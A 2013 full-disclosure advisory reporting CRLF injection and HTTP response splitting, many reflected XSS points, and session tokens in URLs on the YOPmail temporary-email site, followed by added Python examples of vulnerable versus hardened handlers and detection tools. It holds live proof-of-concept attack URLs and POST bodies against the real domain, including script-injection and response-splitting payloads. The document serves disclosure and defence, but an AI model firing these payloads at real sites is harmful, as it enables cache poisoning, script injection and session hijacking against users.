YOPMail suffers from cross site scripting, HTTP response splitting, CRLF injection, and session token handling vulnerabilities.
YOPMAIL (Anonymous & Free email address) CRLF Injection - HTTP Response Splitting / XSS / Session Token in URL
==================================================================================================================================================
Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: Vendor Response
2013-06-07: Asked About the Issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Asked About the Issues
2013-06-27: Not Fixed / No Response
2013-06-28: Full Disclosure
I-VULNERABILITIES
======================
#Title: YOPMAIL (Anonymous & Free email address) CRLF Injection - HTTP Response Splitting / XSS / Session Token in URL
#Vendor: http://www.yopmail.com
#Author:Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight
II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. Messages are kept for 8 days.
It is possible to send a message to another YOPmail address. No registration is required. Add-ons for Firefox, Internet Explorer 7 and
Opera are available for download. There are alternate domains.
Domains
@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site adds new domains every three months.
III-PROOF OF CONCEPT
======================
CRLF INJECTION-HTTP RESPONSE SPLITING
______________________________________
CRLF injection (called HTTP response splitting when the injected line break lets the attacker terminate the header block and write a
second response) is a simple yet powerful web attack: user input containing %0d%0a reaches a response header unfiltered. Attackers actively
exploit it to perform cross-site scripting, cross-user defacement, poisoning of the client's web cache or of an intermediate proxy's cache,
hijacking of web pages, and a range of related attacks.
Attacks
-------
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717
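The following is an added example, not YOPmail's code and not part of the original advisory. It models a handler that copies the cfg query parameter into a response header (the Set-Cookie context and the cfg name are assumptions chosen to match the URLs above), shows the check a tester runs against the raw response to confirm that the injected header line is present, shows a constructed payload that splits the response into a second, attacker-written one, and contrasts the hardened handler that rejects anything outside a known-good alphabet.

```python
# Added example (not YOPmail's code): a model of a handler that copies the cfg
# query parameter into a response header, the CR/LF checks a tester runs on the
# raw response, and the hardened handler. The Set-Cookie context and the
# allowed alphabet are assumptions for illustration.
import re
from urllib.parse import parse_qs, urlsplit

# URL taken from the advisory; its cfg value decodes to "\r\n SomeCustom...".
ADVISORY_URL = ("http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20"
                "SomeCustomInjectedHeader%3ainjected_by_secnight&r=524")

# Constructed payload: closes the first response (Content-Length: 0) and
# appends a complete second response carrying a script.
SPLIT_PAYLOAD = ("\r\nContent-Length: 0\r\n\r\n"
                 "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                 "Content-Length: 25\r\n\r\n<script>alert(1)</script>")


def cfg_from_url(url):
    """Percent-decode the cfg parameter the way PHP's $_GET would."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("cfg", [""])[0]


def vulnerable_response(cfg):
    """Vulnerable: the untrusted value is written verbatim into a header line."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Set-Cookie: cfg={cfg}\r\n"
            "Location: /\r\n\r\n").encode("latin-1")


def cfg_is_safe(cfg):
    """Allow-list check: short, known-good alphabet, so CR/LF can never reach a header."""
    return re.fullmatch(r"[A-Za-z0-9_-]{0,32}", cfg) is not None


def hardened_response(cfg):
    """Hardened: validate before the value is used in any header."""
    if not cfg_is_safe(cfg):
        raise ValueError("cfg rejected: unexpected characters")
    return ("HTTP/1.1 302 Found\r\n"
            f"Set-Cookie: cfg={cfg}\r\n"
            "Location: /\r\n\r\n").encode("latin-1")


def header_lines(raw):
    """Header block of a raw response as a list of lines, status line dropped."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return head.split("\r\n")[1:]


def injected_header_present(raw, name):
    """True if some header line starts with the injected header name.

    The leading %20 in the advisory payloads makes that line an obs-fold
    continuation under RFC 7230: strict parsers glue it to the previous
    header, lenient ones (which the scanner payload relies on) see a new
    header. Stripping leading whitespace reproduces the lenient view.
    """
    want = name.lower() + ":"
    return any(line.lstrip(" \t").lower().startswith(want)
               for line in header_lines(raw))


def status_line_count(raw):
    """Number of HTTP status lines in the raw bytes; 2 means the response was split."""
    text = raw.decode("latin-1")
    return sum(1 for line in text.split("\r\n")
               if re.match(r"HTTP/1\.[01] \d{3}", line))


if __name__ == "__main__":
    cfg = cfg_from_url(ADVISORY_URL)
    print(repr(cfg))
    print("injected header:", injected_header_present(vulnerable_response(cfg),
                                                      "SomeCustomInjectedHeader"))
    print("responses after split payload:",
          status_line_count(vulnerable_response(SPLIT_PAYLOAD)))
    print("hardened accepts payload:", cfg_is_safe(cfg))
```

The split payload works only when the front end does not itself normalise Content-Length; against a caching proxy the second response is what gets stored for the next client, which is the cache-poisoning case named above.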
Multiple CROSS SITE SCRIPTING
_______________________________
Cross-site scripting (XSS) places attacker-controlled script into a page the application serves, so the victim's browser executes it in the
site's origin. The injected script runs every time the page is loaded, or whenever an associated event (such as onmouseover) fires.
Attacks
--------
Only a few instances are shown below; the service has many flaws of this type.
Affected items
/add-domain.php
/alternate-domains.php
/alternate-email-address.php
/conditions.php
/contact.php
/definitions/email-jetable.php
/definitions/mail-anonyme.php
/definitions/spam.php
/donation.php
/email-anonyme.php
/email-generator.php
/en
/en/add-domain.php
/en/alternate-domains.php
/en/alternate-email-address.php
/en/conditions.php
/en/contact.php
/en/definitions
/en/definitions/email-jetable.php
/en/definitions/mail-anonyme.php
/en/definitions/spam.php
/en/donation.php
/en/email-anonyme.php
/en/email-generator.php
/en/faq.php
/en/images
/en/index.php
/en/plugins.php
/en/privacy.php
/en/send-mail.php
/en/style
/en/style/pic
/en/yopmail-chat.php
/es
/es/add-domain.php
/es/alternate-domains.php
/es/alternate-email-address.php
/es/conditions.php
/es/contact.php
/es/definitions
/es/definitions/email-jetable.php
/es/definitions/mail-anonyme.php
/es/definitions/spam.php
/es/donation.php
/es/email-anonyme.php
/es/email-generator.php
/es/faq.php
/es/images
/es/index.php
/es/plugins.php
/es/privacy.php
/es/send-mail.php
/es/style
/es/style/pic
/es/yopmail-chat.php
/faq.php
/fr
/fr/add-domain.php
/fr/alternate-domains.php
/fr/alternate-email-address.php
/fr/conditions.php
/fr/contact.php
/fr/definitions
/fr/definitions/email-jetable.php
/fr/definitions/mail-anonyme.php
/fr/definitions/spam.php
/fr/donation.php
/fr/email-anonyme.php
/fr/email-generator.php
/fr/faq.php
/fr/images
/fr/index.php
/fr/plugins.php
/fr/privacy.php
/fr/send-mail.php
/fr/style
/fr/style/pic
/fr/yopmail-chat.php
/index.php
/it
/it/add-domain.php
/it/alternate-domains.php
/it/alternate-email-address.php
/it/conditions.php
/it/contact.php
/it/definitions
/it/definitions/email-jetable.php
/it/definitions/mail-anonyme.php
/it/definitions/spam.php
/it/donation.php
/it/email-anonyme.php
/it/email-generator.php
/it/faq.php
/it/images
/it/index.php
/it/plugins.php
/it/privacy.php
/it/send-mail.php
/it/style
/it/style/pic
/it/yopmail-chat.php
/pl
/pl/add-domain.php
/pl/alternate-domains.php
/pl/alternate-email-address.php
/pl/conditions.php
/pl/contact.php
/pl/definitions
/pl/definitions/email-jetable.php
/pl/definitions/mail-anonyme.php
/pl/definitions/spam.php
/pl/donation.php
/pl/email-anonyme.php
/pl/email-generator.php
/pl/faq.php
/pl/images
/pl/index.php
/pl/plugins.php
/pl/privacy.php
/pl/send-mail.php
/pl/style
/pl/style/pic
/pl/yopmail-chat.php
/plugins.php
/privacy.php
/ru
/ru/add-domain.php
/ru/alternate-domains.php
/ru/alternate-email-address.php
/ru/conditions.php
/ru/contact.php
/ru/definitions
/ru/definitions/email-jetable.php
/ru/definitions/mail-anonyme.php
/ru/definitions/spam.php
/ru/donation.php
/ru/email-anonyme.php
/ru/email-generator.php
/ru/faq.php
/ru/images
/ru/index.php
/ru/plugins.php
/ru/privacy.php
/ru/send-mail.php
/ru/style
/ru/style/pic
/ru/yopmail-chat.php
/send-mail.php
/uk
/uk/add-domain.php
/uk/alternate-domains.php
/uk/alternate-email-address.php
/uk/conditions.php
/uk/contact.php
/uk/definitions
/uk/definitions/email-jetable.php
/uk/definitions/mail-anonyme.php
/uk/definitions/spam.php
/uk/donation.php
/uk/email-anonyme.php
/uk/email-generator.php
/uk/faq.php
/uk/images
/uk/index.php
/uk/plugins.php
/uk/privacy.php
/uk/send-mail.php
/uk/style
/uk/style/pic
/uk/yopmail-chat.php
/yopmail-chat.php
/zh
/zh/add-domain.php
/zh/alternate-domains.php
/zh/alternate-email-address.php
/zh/conditions.php
/zh/contact.php
/zh/definitions
/zh/definitions/email-jetable.php
/zh/definitions/mail-anonyme.php
/zh/definitions/spam.php
/zh/donation.php
/zh/email-anonyme.php
/zh/email-generator.php
/zh/faq.php
/zh/images
/zh/index.php
/zh/plugins.php
/zh/privacy.php
/zh/send-mail.php
/zh/style
/zh/style/pic
/zh/yopmail-chat.php
Method GET
----------
http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec
http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec
http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid
http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E
http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E
http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E
http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E
http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E
http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E
Method POST
------------
http://www.yopmail.com:80/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst
http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst
http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
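The following is an added example, not YOPmail's code and not part of the original advisory. It models a PHP-style page that echoes the request path into a form attribute and into page text (the template is an assumption chosen to cover the two contexts the GET payloads above target: the %22onmouseover= attribute break-out and the %3CScRiPt%3E tag injection), the same page with context-appropriate output encoding, and a parser-based check that reports whether a reflected payload actually became a tag or an event-handler attribute rather than merely appearing in the response text.

```python
# Added example (not YOPmail's code): a model page that reflects the request
# path into an attribute and into text, the encoded version, and an HTML
# parser check that tells a reflected string from a live injection.
# The template is an assumption chosen to match the advisory's payload contexts.
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Two paths from the advisory: one escapes a quoted attribute, one injects a tag.
ATTR_PAYLOAD = "/en/plugins.php/%22onmouseover=prompt(908426)%3E"
TAG_PAYLOAD = "/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E"

# Assumed page: the path lands in a quoted attribute and in element text.
TEMPLATE = ('<form action="{path}" method="post"><input name="login"></form>'
            '<p>Not found: {path}</p>')


def render_vulnerable(request_path):
    """Vulnerable: the decoded path is interpolated with no output encoding."""
    return TEMPLATE.format(path=unquote(request_path))


def render_hardened(request_path):
    """Hardened: HTML-encode for the output context; quote=True also encodes " and '."""
    return TEMPLATE.format(path=html.escape(unquote(request_path), quote=True))


class _Audit(HTMLParser):
    """Records script elements and on* attributes, i.e. what a browser would execute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def injected_handlers(document):
    """List of script elements and event handlers the parser sees in the document."""
    parser = _Audit()
    parser.feed(document)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for path in (ATTR_PAYLOAD, TAG_PAYLOAD):
        print(path)
        print("  vulnerable:", injected_handlers(render_vulnerable(path)))
        print("  hardened:  ", injected_handlers(render_hardened(path)))
```

The parser check is what separates a real finding from a false positive: a payload echoed inside an HTML-encoded attribute still appears verbatim in a grep of the response, but no browser will treat it as an attribute or a tag.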
SESSION TOKEN IN URL
____________________
This application places the session token in the query string. A session token is sensitive and must not appear in the URL: URLs are
written to browser history and to proxy and server logs, and they are sent to third parties in the Referer header of any outbound request.
Affected items
--------------
/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
Examples
Method GET
----------
http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&
http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Method POST
-----------
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
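The following is an added example, not YOPmail's code and not part of the original advisory. It is an offline check for the session-token-in-URL issue: it scans access-log lines (constructed here in Apache combined format, with a PHPSESSID value copied from the URLs above) for session identifiers carried in the request target or in the Referer, and it provides a redaction helper for logs that already contain such URLs. The list of parameter names is an assumption. On the application side the fix is to stop accepting and emitting the session id in URLs, which for PHP means session.use_only_cookies = 1 and session.use_trans_sid = 0.

```python
# Added example (not YOPmail's code): flag session identifiers carried in
# URLs, run over constructed Apache combined-format log lines, and redact
# them. The parameter-name list and the log lines are assumptions.
import re
from urllib.parse import parse_qs, urlsplit

SESSION_PARAMS = ("phpsessid", "jsessionid", "aspsessionid",
                  "sessionid", "session_id", "sid")

# Constructed log lines (not real YOPmail traffic); the token is the one
# quoted in the advisory's example URLs.
LOG_LINES = [
    '203.0.113.5 - - [28/Jun/2013:10:00:01 +0200] '
    '"GET /es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 HTTP/1.1" '
    '200 4123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Jun/2013:10:00:07 +0200] "GET /en/faq.php HTTP/1.1" '
    '200 2211 "http://www.yopmail.com/es/email-anonyme.php'
    '?PHPSESSID=osb56hetusbk2ifqdcg5642qs6" "Mozilla/5.0"',
    '198.51.100.9 - - [28/Jun/2013:10:01:15 +0200] "GET /index.php HTTP/1.1" '
    '200 1500 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$')

_REDACT_RE = re.compile(
    r"(?i)((?:^|[?&])(?:%s)=)[^&#]*" % "|".join(SESSION_PARAMS))


def session_params_in(url):
    """Names of query parameters in url that look like session identifiers."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(k for k in query if k.lower() in SESSION_PARAMS)


def audit_log(lines):
    """Findings as (where, parameter, url) tuples, in log order.

    A token in the request target means the app emits or accepts it in URLs;
    a token in the Referer shows the browser forwarding it, which is exactly
    what a third-party site linked from that page would receive in its logs.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name in session_params_in(m["target"]):
            findings.append(("request-url", name, m["target"]))
        if m["referer"] != "-":
            for name in session_params_in(m["referer"]):
                findings.append(("referer", name, m["referer"]))
    return findings


def redact(url):
    """Replace the value of any session parameter in url, keeping the rest intact."""
    return _REDACT_RE.sub(r"\1REDACTED", url)


if __name__ == "__main__":
    for where, name, url in audit_log(LOG_LINES):
        print(f"{where:12} {name:10} {redact(url)}")
```

Redaction only limits the damage in logs already collected; a token that has reached a third party through the Referer must be treated as compromised and the session invalidated.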
IV. CREDITS
-------------------------
These vulnerabilities were discovered
by Juan Carlos García (@secnight)
V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.